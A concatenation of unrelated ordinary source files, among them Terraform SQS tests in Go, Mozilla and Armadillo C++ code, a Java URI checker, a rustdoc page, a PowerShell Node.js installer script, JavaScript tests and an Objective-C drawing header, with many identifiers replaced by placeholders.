}
return nil
}
func <API key>(n string) resource.TestCheckFunc {
return func(s *terraform.State) error {
rs, ok := s.RootModule().Resources[n]
if !ok {
return fmt.Errorf("Not found: %s", n)
}
if rs.Primary.ID == "" {
return fmt.Errorf("No Queue URL specified!")
}
conn := testAccProvider.Meta().(*AWSClient).sqsconn
params := &sqs.<API key>{
QueueURL: aws.String(rs.Primary.ID),
AttributeNames: []*string{aws.String("All")},
}
resp, err := conn.GetQueueAttributes(params)
if err != nil {
return err
}
// checking if attributes are defaults
for k, v := range resp.Attributes {
if k == "VisibilityTimeout" && *v != "30" {
return fmt.Errorf("VisibilityTimeout (%s) was not set to 30", *v)
}
if k == "<API key>" && *v != "345600" {
return fmt.Errorf("<API key> (%s) was not set to 345600", *v)
}
if k == "MaximumMessageSize" && *v != "262144" {
return fmt.Errorf("MaximumMessageSize (%s) was not set to 262144", *v)
}
if k == "DelaySeconds" && *v != "0" {
return fmt.Errorf("DelaySeconds (%s) was not set to 0", *v)
}
if k == "<API key>" && *v != "0" {
return fmt.Errorf("<API key> (%s) was not set to 0", *v)
}
}
return nil
}
}
func <API key>(n string) resource.TestCheckFunc {
return func(s *terraform.State) error {
rs, ok := s.RootModule().Resources[n]
if !ok {
return fmt.Errorf("Not found: %s", n)
}
if rs.Primary.ID == "" {
return fmt.Errorf("No Queue URL specified!")
}
conn := testAccProvider.Meta().(*AWSClient).sqsconn
params := &sqs.<API key>{
QueueURL: aws.String(rs.Primary.ID),
AttributeNames: []*string{aws.String("All")},
}
resp, err := conn.GetQueueAttributes(params)
if err != nil {
return err
}
// checking if attributes match our overrides
for k, v := range resp.Attributes {
if k == "VisibilityTimeout" && *v != "60" {
return fmt.Errorf("VisibilityTimeout (%s) was not set to 60", *v)
}
if k == "<API key>" && *v != "86400" {
return fmt.Errorf("<API key> (%s) was not set to 86400", *v)
}
if k == "MaximumMessageSize" && *v != "2048" {
return fmt.Errorf("MaximumMessageSize (%s) was not set to 2048", *v)
}
if k == "DelaySeconds" && *v != "90" {
return fmt.Errorf("DelaySeconds (%s) was not set to 90", *v)
}
if k == "<API key>" && *v != "10" {
return fmt.Errorf("<API key> (%s) was not set to 10", *v)
}
}
return nil
}
}
const <API key> = `
resource "aws_sqs_queue" "queue-with-defaults" {
name = "<API key>"
}
`
const <API key> = `
resource "aws_sqs_queue" "<API key>" {
name = "<API key>"
delay_seconds = 90
max_message_size = 2048
<API key> = 86400
<API key> = 10
<API key> = 60
}
` |
/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
#ifndef <API key>
#define <API key>
#include "mozilla/Attributes.h"
#include "nsContainerFrame.h"
#include "nsIFormControlFrame.h"
#include "<API key>.h"
#include "nsCOMPtr.h"
class nsITextControlFrame;
class nsPresContext;
namespace mozilla {
enum class <API key> : uint8_t;
class WidgetEvent;
class WidgetGUIEvent;
namespace dom {
class HTMLInputElement;
} // namespace dom
} // namespace mozilla
/**
* This frame type is used for <input type=number>.
*/
class <API key> final : public nsContainerFrame
, public <API key>
, public nsIFormControlFrame
{
friend nsIFrame*
<API key>(nsIPresShell* aPresShell, nsStyleContext* aContext);
typedef mozilla::<API key> <API key>;
typedef mozilla::dom::Element Element;
typedef mozilla::dom::HTMLInputElement HTMLInputElement;
typedef mozilla::WidgetEvent WidgetEvent;
typedef mozilla::WidgetGUIEvent WidgetGUIEvent;
explicit <API key>(nsStyleContext* aContext);
public:
<API key>(<API key>)
NS_DECL_QUERYFRAME
<API key>
virtual void DestroyFrom(nsIFrame* aDestructRoot) override;
virtual void <API key>(mozilla::EventStates aStates) override;
virtual bool IsLeaf() const override { return true; }
#ifdef ACCESSIBILITY
virtual mozilla::a11y::AccType AccessibleType() override;
#endif
virtual nscoord GetMinISize(nsRenderingContext* aRenderingContext) override;
virtual nscoord GetPrefISize(nsRenderingContext* aRenderingContext) override;
virtual void Reflow(nsPresContext* aPresContext,
ReflowOutput& aDesiredSize,
const ReflowInput& aReflowInput,
nsReflowStatus& aStatus) override;
virtual nsresult AttributeChanged(int32_t aNameSpaceID,
nsIAtom* aAttribute,
int32_t aModType) override;
// <API key>
virtual nsresult <API key>(nsTArray<ContentInfo>& aElements) override;
virtual void <API key>(nsTArray<nsIContent*>& aElements,
uint32_t aFilter) override;
#ifdef DEBUG_FRAME_DUMP
virtual nsresult GetFrameName(nsAString& aResult) const override {
return MakeFrameName(NS_LITERAL_STRING("NumberControl"), aResult);
}
#endif
virtual nsIAtom* GetType() const override;
virtual bool IsFrameOfType(uint32_t aFlags) const override
{
return nsContainerFrame::IsFrameOfType(aFlags &
~(nsIFrame::eReplaced | nsIFrame::<API key>));
}
// nsIFormControlFrame
virtual void SetFocus(bool aOn, bool aRepaint) override;
virtual nsresult SetFormProperty(nsIAtom* aName, const nsAString& aValue) override;
/**
* This method attempts to localizes aValue and then sets the result as the
* value of our anonymous text control. It's called when our
* HTMLInputElement's value changes, when we need to sync up the value
* displayed in our anonymous text control.
*/
void <API key>(const nsAString& aValue);
/**
* This method gets the string value of our anonymous text control,
* attempts to normalizes (de-localizes) it, then sets the outparam aValue to
* the result. It's called when user input changes the text value of our
* anonymous text control so that we can sync up the internal value of our
* HTMLInputElement.
*/
void <API key>(nsAString& aValue);
bool <API key>();
/**
* Called to notify this frame that its HTMLInputElement is currently
* processing a DOM 'input' event.
*/
void HandlingInputEvent(bool aHandlingEvent)
{
mHandlingInputEvent = aHandlingEvent;
}
HTMLInputElement* GetAnonTextControl();
/**
* If the frame is the frame for an <API key>'s anonymous text
* field, returns the <API key>. Else returns nullptr.
*/
static <API key>* <API key>(nsIFrame* aFrame);
/**
* If the frame is the frame for an <API key>'s up or down spin
* button, returns the <API key>. Else returns nullptr.
*/
static <API key>* <API key>(nsIFrame* aFrame);
enum SpinButtonEnum {
eSpinButtonNone,
eSpinButtonUp,
eSpinButtonDown
};
/**
* Returns one of the SpinButtonEnum values to depending on whether the
* pointer event is over the spin-up button, the spin-down button, or
* neither.
*/
int32_t <API key>(WidgetGUIEvent* aEvent) const;
void SpinnerStateChanged() const;
bool <API key>() const;
bool <API key>() const;
bool IsFocused() const;
void HandleFocusEvent(WidgetEvent* aEvent);
/**
* Our element had HTMLInputElement::Select() called on it.
*/
nsresult HandleSelectCall();
virtual Element* GetPseudoElement(<API key> aType) override;
bool <API key>() const;
private:
nsITextControlFrame* GetTextFieldFrame();
nsresult <API key>(Element** aResult,
nsTArray<ContentInfo>& aElements,
nsIAtom* aTagName,
<API key> aPseudoType,
nsStyleContext* aParentContext);
class <API key>;
friend class <API key>;
class <API key> : public mozilla::Runnable
{
public:
explicit <API key>(<API key>* aFrame)
: mFrame(aFrame)
{}
NS_IMETHOD Run() override
{
<API key>* frame =
static_cast<<API key>*>(mFrame.GetFrame());
NS_ENSURE_STATE(frame);
frame->SyncDisabledState();
return NS_OK;
}
private:
nsWeakFrame mFrame;
};
/**
* Sync the disabled state of the anonymous children up with our content's.
*/
void SyncDisabledState();
/**
* The text field used to edit and show the number.
* @see <API key>::<API key>.
*/
nsCOMPtr<Element> mOuterWrapper;
nsCOMPtr<Element> mTextField;
nsCOMPtr<Element> mSpinBox;
nsCOMPtr<Element> mSpinUp;
nsCOMPtr<Element> mSpinDown;
bool mHandlingInputEvent;
};
#endif // <API key> |
package org.echocat.jomon.net.service;
import org.echocat.jomon.runtime.util.<API key>;
import javax.annotation.Nonnegative;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
import java.net.InetSocketAddress;
import java.net.URI;
import java.net.<API key>;
import static java.net.InetAddress.getByName;
import static java.net.InetSocketAddress.createUnresolved;
import static org.apache.commons.lang3.StringUtils.isNotEmpty;
import static org.echocat.jomon.net.Protocol.tcp;
public abstract class <API key> extends <API key><URI, URI> {
protected <API key>(@Nonnull String service) {
super(tcp, service);
<API key>("CheckServiceUris for " + getService() + "@" + getProtocol().getName());
}
@Nullable
@Override
protected InetSocketAddress toInetSocketAddress(@Nonnull URI input) throws Exception {
final String host = input.getHost();
if (host == null) {
throw new <API key>("No host fond in: "+ input);
}
final int port = getPortFor(input);
InetSocketAddress result;
try {
result = new InetSocketAddress(getByName(host), port);
} catch (final <API key> ignored) {
result = createUnresolved(host, port);
}
return result;
}
@Nonnegative
protected int getPortFor(@Nonnull URI input) throws Exception {
int port = input.getPort();
if (port < 0) {
final String scheme = input.getScheme();
if ("http".equals(scheme)) {
port = 80;
} else if ("https".equals(scheme)) {
port = 443;
} else {
throw new <API key>("No port found in: " + input);
}
}
return port;
}
@Override
protected URI tryGetOutputFor(@Nonnull URI input, @Nonnull InetSocketAddress address, @Nonnull State oldState) throws Exception {
final URI uri = toUri(input, address);
checkUri(uri, oldState);
return uri;
}
/**
* @throws Exception will cause the whole process to stop. This exception is not acceptable.
* @throws <API key> will cause that this uri is marked as unavailable. Another try will follow.
*/
@SuppressWarnings("DuplicateThrows")
protected abstract void checkUri(@Nonnull URI uri, @Nonnull State oldState) throws Exception, <API key>;
@Nonnull
protected URI toUri(@Nonnull URI original, @Nonnull InetSocketAddress address) {
final String scheme = original.getScheme();
final int port = address.getPort();
final String userInfo = original.getRawUserInfo();
final String path = original.getRawPath();
final String query = original.getRawQuery();
final String fragment = original.getRawFragment();
final StringBuilder sb = new StringBuilder();
sb.append(scheme).append(":
if (isNotEmpty(userInfo)) {
sb.append(userInfo).append('@');
}
sb.append(address.getHostString());
if (canAppendPort(scheme, port)) {
sb.append(':').append(port);
}
if (isNotEmpty(path)) {
sb.append(path);
}
if (isNotEmpty(query)) {
sb.append('?').append(query);
}
if (isNotEmpty(fragment)) {
sb.append('#').append(fragment);
}
return URI.create(sb.toString());
}
protected boolean canAppendPort(@Nonnull String scheme, int port) {
return ("http".equals(scheme) && port != 80) || ("https".equals(scheme) && port != 443);
}
} |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `load_with` fn in crate `gleam`.">
<meta name="keywords" content="rust, rustlang, rust-lang, load_with">
<title>gleam::ffi::Ortho::load_with - Rust</title>
<link rel="stylesheet" type="text/css" href="../../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]
<section class="sidebar">
<p class='location'><a href='../../index.html'>gleam</a>::<wbr><a href='../index.html'>ffi</a>::<wbr><a href='index.html'>Ortho</a></p><script>window.sidebarCurrent = {name: 'load_with', ty: 'fn', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content fn">
<h1 class='fqn'><span class='in-band'>Function <a href='../../index.html'>gleam</a>::<wbr><a href='../index.html'>ffi</a>::<wbr><a href='index.html'>Ortho</a>::<wbr><a class='fn' href=''>load_with</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-44081' class='srclink' href='../../../src/gleam///home/servo/buildbot/slave/doc/build/target/debug/build/<API key>/out/gl_bindings.rs.html#14449-14453' title='goto source code'>[src]</a></span></h1>
<pre class='rust fn'>pub fn load_with<F>(loadfn: F) <span class='where'>where F: <a class='trait' href='../../../core/ops/trait.FnMut.html' title='core::ops::FnMut'>FnMut</a>(&<a href='../../../std/primitive.str.html'>str</a>) -> <a href='../../../std/primitive.pointer.html'>*const <a class='enum' href='../../../libc/types/common/c95/enum.c_void.html' title='libc::types::common::c95::c_void'>c_void</a></a></span></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../../../";
window.currentCrate = "gleam";
window.playgroundUrl = "";
</script>
<script src="../../../jquery.js"></script>
<script src="../../../main.js"></script>
<script async src="../../../search-index.js"></script>
</body>
</html> |
// This Source Code Form is subject to the terms of the Mozilla Public
//! \addtogroup fn_interp1
template<typename eT>
inline
void
<API key>(const Mat<eT>& XG, const Mat<eT>& YG, const Mat<eT>& XI, Mat<eT>& YI)
{
<API key>();
const eT XG_min = XG.min();
const eT XG_max = XG.max();
YI.copy_size(XI);
const eT* XG_mem = XG.memptr();
const eT* YG_mem = YG.memptr();
const eT* XI_mem = XI.memptr();
eT* YI_mem = YI.memptr();
const uword NG = XG.n_elem;
const uword NI = XI.n_elem;
uword best_j = 0;
for(uword i=0; i<NI; ++i)
{
eT best_err = Datum<eT>::inf;
const eT XI_val = XI_mem[i];
arma_debug_check( ((XI_val < XG_min) || (XI_val > XG_max)), "interp1(): extrapolation not supported" );
// XG and XI are guaranteed to be sorted in ascending manner,
// so start searching XG from last known optimum position
for(uword j=best_j; j<NG; ++j)
{
const eT tmp = XG_mem[j] - XI_val;
const eT err = (tmp >= eT(0)) ? tmp : -tmp;
if(err >= best_err)
{
// error is going up, so we have found the optimum position
break;
}
else
{
best_err = err;
best_j = j; // remember the optimum position
}
}
YI_mem[i] = YG_mem[best_j];
}
}
template<typename eT>
inline
void
<API key>(const Mat<eT>& XG, const Mat<eT>& YG, const Mat<eT>& XI, Mat<eT>& YI)
{
<API key>();
const eT XG_min = XG.min();
const eT XG_max = XG.max();
YI.copy_size(XI);
const eT* XG_mem = XG.memptr();
const eT* YG_mem = YG.memptr();
const eT* XI_mem = XI.memptr();
eT* YI_mem = YI.memptr();
const uword NG = XG.n_elem;
const uword NI = XI.n_elem;
uword a_best_j = 0;
uword b_best_j = 0;
for(uword i=0; i<NI; ++i)
{
const eT XI_val = XI_mem[i];
arma_debug_check( ((XI_val < XG_min) || (XI_val > XG_max)), "interp1(): extrapolation not supported" );
// XG and XI are guaranteed to be sorted in ascending manner,
// so start searching XG from last known optimum position
eT a_best_err = Datum<eT>::inf;
eT b_best_err = Datum<eT>::inf;
for(uword j=a_best_j; j<NG; ++j)
{
const eT tmp = XG_mem[j] - XI_val;
const eT err = (tmp >= eT(0)) ? tmp : -tmp;
if(err >= a_best_err)
{
break;
}
else
{
a_best_err = err;
a_best_j = j;
}
}
if( (XG_mem[a_best_j] - XI_val) <= eT(0) )
{
// a_best_j is to the left of the interpolated position
b_best_j = ( (a_best_j+1) < NG) ? (a_best_j+1) : a_best_j;
}
else
{
// a_best_j is to the right of the interpolated position
b_best_j = (a_best_j >= 1) ? (a_best_j-1) : a_best_j;
}
b_best_err = std::abs( XG_mem[b_best_j] - XI_val );
if(a_best_j > b_best_j)
{
std::swap(a_best_j, b_best_j );
std::swap(a_best_err, b_best_err);
}
const eT weight = (a_best_err > eT(0)) ? (a_best_err / (a_best_err + b_best_err)) : eT(0);
YI_mem[i] = (eT(1) - weight)*YG_mem[a_best_j] + (weight)*YG_mem[b_best_j];
}
}
template<typename eT>
inline
void
interp1_helper(const Mat<eT>& X, const Mat<eT>& Y, const Mat<eT>& XI, Mat<eT>& YI, const uword sig)
{
<API key>();
arma_debug_check( ((X.is_vec() == false) || (Y.is_vec() == false) || (XI.is_vec() == false)), "interp1(): currently only vectors are supported" );
arma_debug_check( (X.n_elem != Y.n_elem), "interp1(): X and Y must have the same number of elements" );
arma_debug_check( (X.n_elem < 2), "interp1(): X must have at least two elements" );
// sig = 10: nearest neighbour
// sig = 11: nearest neighbour, assume monotonic increase in X and XI
// sig = 20: linear
// sig = 21: linear, assume monotonic increase in X and XI
if(sig == 11) { <API key>(X, Y, XI, YI); return; }
if(sig == 21) { <API key> (X, Y, XI, YI); return; }
Mat<eT> X_tmp;
Mat<eT> Y_tmp;
const bool X_is_sorted = X.is_sorted();
if(X_is_sorted == false)
{
const uvec X_indices = stable_sort_index(X);
const uword N = X.n_elem;
X_tmp.set_size(N);
Y_tmp.set_size(N);
const uword* X_indices_mem = X_indices.memptr();
const eT* X_mem = X.memptr();
const eT* Y_mem = Y.memptr();
eT* X_tmp_mem = X_tmp.memptr();
eT* Y_tmp_mem = Y_tmp.memptr();
for(uword i=0; i<N; ++i)
{
const uword j = X_indices_mem[i];
X_tmp_mem[i] = X_mem[j];
Y_tmp_mem[i] = Y_mem[j];
}
}
const Mat<eT>& X_sorted = (X_is_sorted) ? X : X_tmp;
const Mat<eT>& Y_sorted = (X_is_sorted) ? Y : Y_tmp;
Mat<eT> XI_tmp;
uvec XI_indices;
const bool XI_is_sorted = XI.is_sorted();
if(XI_is_sorted == false)
{
XI_indices = stable_sort_index(XI);
const uword N = XI.n_elem;
XI_tmp.copy_size(XI);
const uword* XI_indices_mem = XI_indices.memptr();
const eT* XI_mem = XI.memptr();
eT* XI_tmp_mem = XI_tmp.memptr();
for(uword i=0; i<N; ++i)
{
XI_tmp_mem[i] = XI_mem[ XI_indices_mem[i] ];
}
}
const Mat<eT>& XI_sorted = (XI_is_sorted) ? XI : XI_tmp;
if(sig == 10) { <API key>(X_sorted, Y_sorted, XI_sorted, YI); }
else if(sig == 20) { <API key> (X_sorted, Y_sorted, XI_sorted, YI); }
if( (XI_is_sorted == false) && (YI.n_elem > 0) )
{
Mat<eT> YI_unsorted;
YI_unsorted.copy_size(YI);
const eT* YI_mem = YI.memptr();
eT* YI_unsorted_mem = YI_unsorted.memptr();
const uword N = XI_sorted.n_elem;
const uword* XI_indices_mem = XI_indices.memptr();
for(uword i=0; i<N; ++i)
{
YI_unsorted_mem[ XI_indices_mem[i] ] = YI_mem[i];
}
YI.steal_mem(YI_unsorted);
}
}
template<typename T1, typename T2, typename T3>
inline
typename
enable_if2
<
is_real<typename T1::elem_type>::value,
void
>::result
interp1
(
const Base<typename T1::elem_type, T1>& X,
const Base<typename T1::elem_type, T2>& Y,
const Base<typename T1::elem_type, T3>& XI,
Mat<typename T1::elem_type>& YI,
const char* method = "linear"
)
{
<API key>();
typedef typename T1::elem_type eT;
uword sig = 0;
if(method != NULL )
if(method[0] != char(0))
if(method[1] != char(0))
{
const char c1 = method[0];
const char c2 = method[1];
if(c1 == 'n') { sig = 10; } // nearest neighbour
else if(c1 == 'l') { sig = 20; } // linear
else
{
if( (c1 == '*') && (c2 == 'n') ) { sig = 11; } // nearest neighour, assume monotonic increase in X and XI
if( (c1 == '*') && (c2 == 'l') ) { sig = 21; } // linear, assume monotonic increase in X and XI
}
}
arma_debug_check( (sig == 0), "interp1(): unsupported interpolation type" );
const quasi_unwrap<T1> X_tmp( X.get_ref());
const quasi_unwrap<T2> Y_tmp( Y.get_ref());
const quasi_unwrap<T3> XI_tmp(XI.get_ref());
if( X_tmp.is_alias(YI) || Y_tmp.is_alias(YI) || XI_tmp.is_alias(YI) )
{
Mat<eT> tmp;
interp1_helper(X_tmp.M, Y_tmp.M, XI_tmp.M, tmp, sig);
YI.steal_mem(tmp);
}
else
{
interp1_helper(X_tmp.M, Y_tmp.M, XI_tmp.M, YI, sig);
}
} |
$msipath = "$PSScriptRoot\node-installer.msi"
function RunCommand ($command, $command_args) {
Write-Host $command $command_args
Start-Process -FilePath $command -ArgumentList $command_args -Wait -Passthru
}
function InstallNode () {
DownloadNodeMSI
InstallNodeMSI
}
function DownloadNodeMSI () {
$url = "https://nodejs.org/dist/v12.18.4/node-v12.18.4-x64.msi"
$start_time = Get-Date
Write-Output "Downloading node msi"
Invoke-WebRequest -Uri $url -OutFile $msipath
Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"
}
function InstallNodeMSI () {
$install_args = "/qn /log node_install.log /i $msipath"
$uninstall_args = "/qn /x $msipath"
RunCommand "msiexec.exe" $install_args
#if (-not(Test-Path $python_home)) {
# Write-Host "Python seems to be installed else-where, reinstalling."
# RunCommand "msiexec.exe" $uninstall_args
# RunCommand "msiexec.exe" $install_args
}
function main () {
InstallNode
rm $msipath
}
main |
/* -*- indent-tabs-mode: nil; js-indent-level: 2 -*- */
var BUGNUMBER = 406477;
var summary = 'eval of function x() in a function with an argument "x" and "let x"';
var actual = '';
var expect = '';
test();
function test()
{
enterFunc ('test');
printBugNumber(BUGNUMBER);
printStatus (summary);
function test2(x, src)
{
var y = 1;
{
let x = 2;
let y = 2;
eval(src);
}
return [x, y];
}
var expect = actual = '';
var [test_param_result, test_var_result] =
test2(1, "function x() { }\nfunction y() { }\n");
if (typeof test_param_result != "function")
actual += "Unexpected test_param_result value: "+uneval(test_param_result)+"\n";
if (typeof test_var_result != "function")
actual += "Unexpected test_var_result value: "+uneval(test_var_result)+"\n";
reportCompare(expect, actual, summary);
exitFunc ('test');
} |
const ChainedMap = require('../src/ChainedMap');
test('is Chainable', () => {
const parent = { parent: true };
const map = new ChainedMap(parent);
expect(map.end()).toBe(parent);
});
test('creates a backing Map', () => {
const map = new ChainedMap();
expect(map.store instanceof Map).toBe(true);
});
test('set', () => {
const map = new ChainedMap();
expect(map.set('a', 'alpha')).toBe(map);
expect(map.store.get('a')).toBe('alpha');
});
test('get', () => {
const map = new ChainedMap();
expect(map.set('a', 'alpha')).toBe(map);
expect(map.get('a')).toBe('alpha');
});
test('getOrCompute', () => {
const map = new ChainedMap();
expect(map.get('a')).toBeUndefined();
expect(map.getOrCompute('a', () => 'alpha')).toBe('alpha');
expect(map.get('a')).toBe('alpha');
});
test('clear', () => {
const map = new ChainedMap();
map.set('a', 'alpha');
map.set('b', 'beta');
map.set('c', 'gamma');
expect(map.store.size).toBe(3);
expect(map.clear()).toBe(map);
expect(map.store.size).toBe(0);
});
test('delete', () => {
const map = new ChainedMap();
map.set('a', 'alpha');
map.set('b', 'beta');
map.set('c', 'gamma');
expect(map.delete('b')).toBe(map);
expect(map.store.size).toBe(2);
expect(map.store.has('b')).toBe(false);
});
test('has', () => {
const map = new ChainedMap();
map.set('a', 'alpha');
map.set('b', 'beta');
map.set('c', 'gamma');
expect(map.has('b')).toBe(true);
expect(map.has('d')).toBe(false);
expect(map.has('b')).toBe(map.store.has('b'));
});
test('values', () => {
const map = new ChainedMap();
map.set('a', 'alpha');
map.set('b', 'beta');
map.set('c', 'gamma');
expect(map.values()).toStrictEqual(['alpha', 'beta', 'gamma']);
});
test('entries with values', () => {
const map = new ChainedMap();
map.set('a', 'alpha');
map.set('b', 'beta');
map.set('c', 'gamma');
expect(map.entries()).toStrictEqual({ a: 'alpha', b: 'beta', c: 'gamma' });
});
test('entries with no values', () => {
const map = new ChainedMap();
expect(map.entries()).toBeUndefined();
});
test('merge with no values', () => {
const map = new ChainedMap();
const obj = { a: 'alpha', b: 'beta', c: 'gamma' };
expect(map.merge(obj)).toBe(map);
expect(map.entries()).toStrictEqual(obj);
});
test('merge with existing values', () => {
const map = new ChainedMap();
const obj = { a: 'alpha', b: 'beta', c: 'gamma' };
map.set('d', 'delta');
expect(map.merge(obj)).toBe(map);
expect(map.entries()).toStrictEqual({
a: 'alpha',
b: 'beta',
c: 'gamma',
d: 'delta',
});
});
test('merge with overriding values', () => {
const map = new ChainedMap();
const obj = { a: 'alpha', b: 'beta', c: 'gamma' };
map.set('b', 'delta');
expect(map.merge(obj)).toBe(map);
expect(map.entries()).toStrictEqual({ a: 'alpha', b: 'beta', c: 'gamma' });
});
test('merge with omitting keys', () => {
const map = new ChainedMap();
const obj = { a: 'alpha', b: 'beta', c: 'gamma' };
map.merge(obj, ['b']);
expect(map.entries()).toStrictEqual({ a: 'alpha', c: 'gamma' });
});
test('when true', () => {
const map = new ChainedMap();
const right = (instance) => {
expect(instance).toBe(map);
instance.set('alpha', 'a');
};
const left = (instance) => {
instance.set('beta', 'b');
};
expect(map.when(true, right, left)).toBe(map);
expect(map.has('alpha')).toBe(true);
expect(map.has('beta')).toBe(false);
});
test('when false', () => {
const map = new ChainedMap();
const right = (instance) => {
instance.set('alpha', 'a');
};
const left = (instance) => {
expect(instance).toBe(map);
instance.set('beta', 'b');
};
expect(map.when(false, right, left)).toBe(map);
expect(map.has('alpha')).toBe(false);
expect(map.has('beta')).toBe(true);
});
test('clean undefined', () => {
const map = new ChainedMap();
map.set('alpha', undefined);
map.set('beta', 'b');
expect('alpha' in map.entries()).toBe(true);
expect('alpha' in map.clean(map.entries())).toBe(false);
expect('beta' in map.clean(map.entries())).toBe(true);
});
test('clean empty array', () => {
const map = new ChainedMap();
map.set('alpha', []);
expect('alpha' in map.entries()).toBe(true);
expect('alpha' in map.clean(map.entries())).toBe(false);
});
test('clean empty object', () => {
const map = new ChainedMap();
map.set('alpha', {});
expect('alpha' in map.entries()).toBe(true);
expect('alpha' in map.clean(map.entries())).toBe(false);
}); |
var OHMS = (function(OHMS) {
var FileUploadAnswer = function(question, data) {
this.text = data.text;
this.max_pts = data.max_pts;
this.solution = data.solution;
OHMS.Answer.apply(this, arguments);
}
FileUploadAnswer.prototype = new OHMS.Answer();
FileUploadAnswer.prototype.get_file = function () {
return this.element.get(0);
}
FileUploadAnswer.prototype.create_element = function () {
/* this.element = $("<div class='Answer'/>");
this.element.append("<input type='file' class='file'/>");
*/
this.element = $("<input type='file' class='Answer'/>");
}
FileUploadAnswer.prototype.show_solution = function () {
this.element = null;
}
FileUploadAnswer.prototype.set_value = function () {
}
FileUploadAnswer.prototype.get_value = function () {
return this.get_file().files[0]
}
OHMS.FileUploadAnswer = FileUploadAnswer;
return OHMS;
}(OHMS)) |
#import <Cocoa/Cocoa.h>
#import "DKDrawableObject.h"
<API key>
@class DKDrawableShape;
@class DKKnob;
//! editing modes:
typedef NS_ENUM(NSInteger, <API key>) {
<API key> = 0, //!< normal operation - just move points on the existing path
<API key> = 1, //!< create a straight line between two points
<API key> = 2, //!< create a curved path point by point
<API key> = 3, //!< create an irreglar polygon pont by point (multiple lines)
<API key> = 4, //!< create a curve path by dragging freehand
<API key> = 5, //!< create an arc section
<API key> = 6 //!< create a wedge section
};
typedef NS_ENUM(NSInteger, <API key>) {
kDKPathNoJoin = 0,
<API key> = 1,
<API key> = 2,
<API key> = 3
};
//! path point types that can be passed to pathInsertPointAt:ofType:
typedef NS_ENUM(NSInteger, <API key>) {
<API key> = 0, //!< insert whatever the hit element is already using
<API key> = 1, //!< insert a line segment
<API key> = 2, //!< insert a curve segment
<API key> = 3, //!< insert the opposite of whatever hit element is already using
};
// the class:
/** @brief DKDrawablePath is a drawable object that renders a path such as a line or curve (bezigon).
\c DKDrawablePath is a drawable object that renders a path such as a line or curve (bezigon).
The path is rendered at its stored size, not transformed to its final size like DKDrawableShape. Thus this type of object doesn't
maintain the concept of rotation or scale - it just is what it is.
*/
@interface DKDrawablePath : DKDrawableObject <NSCoding, NSCopying, <API key>> {
@private
NSBezierPath* m_path;
NSBezierPath* m_undoPath;
<API key> m_editPathMode;
CGFloat m_freehandEpsilon;
BOOL m_extending;
}
// convenience constructors:
/** @brief Creates a drawable path object for an existing NSBezierPath
Convenience method allows you to turn any path into a drawable that can be added to a drawing
@param path the path to use
@return a new drawable path object which has the path supplied
*/
+ (instancetype)<API key>:(NSBezierPath*)path;
/** @brief Creates a drawable path object for an existing NSBezierPath and style
Convenience method allows you to turn any path into a drawable that can be added to a drawing
@param path the path to use
@param aStyle a style to apply to the path
@return a new drawable path object which has the path supplied
*/
+ (instancetype)<API key>:(NSBezierPath*)path withStyle:(DKStyle*)aStyle;
// colour for feedback window:
/** @brief The background colour to use for the info window displayed when interacting with paths
*/
@property (class, retain) NSColor* <API key>;
/** @brief Set whether the default hit-detection behaviour is to prioritise on-path points or off-path points
Affects hit-detection when on-path and off-path points are coincident. Normally off-path points
have priority, but an alternative approach is to have on-path points have priority, and the off-path
points require the use of the command modifier key to be hit-detected. DK has previously always
prioritised off-path points, but this setting allows you to change that for your app.
*/
@property (class) BOOL <API key>;
- (instancetype)initWithBezierPath:(NSBezierPath*)aPath;
/** @brief Initialises a drawable path object from an existing path with the given style
The path is retained, not copied
@param aPath the path to use
@param aStyle the style to use
@return the drawable path object
*/
- (instancetype)initWithBezierPath:(NSBezierPath*)aPath style:(DKStyle*)aStyle;
/** @brief Angle of constraint for new paths.
*/
@property (class) CGFloat <API key>;
/** @brief Should the angle of the path be constrained?
Returns yes if the shift key is currently held down, otherwise no.
*/
- (BOOL)constrainWithEvent:(NSEvent*)anEvent;
// setting the path & path info
@property (copy) NSBezierPath* path;
- (void)<API key>:(NSBezierPath*)path usingKnobs:(DKKnob*)knobs;
/** @brief Return the length of the path
Length is accurately computed by summing the segment distances.
@return the path's length
*/
@property (readonly) CGFloat length;
/** @brief Return the length along the path for a given point
Points too far from the path return a value of -1. To be within range, the point needs to be within
4 x the widest stroke drawn by the style, or 4 points, whichever is larger.
@param mp a point somewhere close to the path
@return a distance along the path nearest to the point
*/
- (CGFloat)lengthForPoint:(NSPoint)mp;
/** @brief Return the length along the path for a given point
Points too far from the path return a value of -1. The point needs to be <tol> or less from the path.
@param mp a point somewhere close to the path
@param tol the tolerance value
@return a distance along the path nearest to the point
*/
- (CGFloat)lengthForPoint:(NSPoint)mp tolerance:(CGFloat)tol;
/** @brief Return the length to display to the user of a path
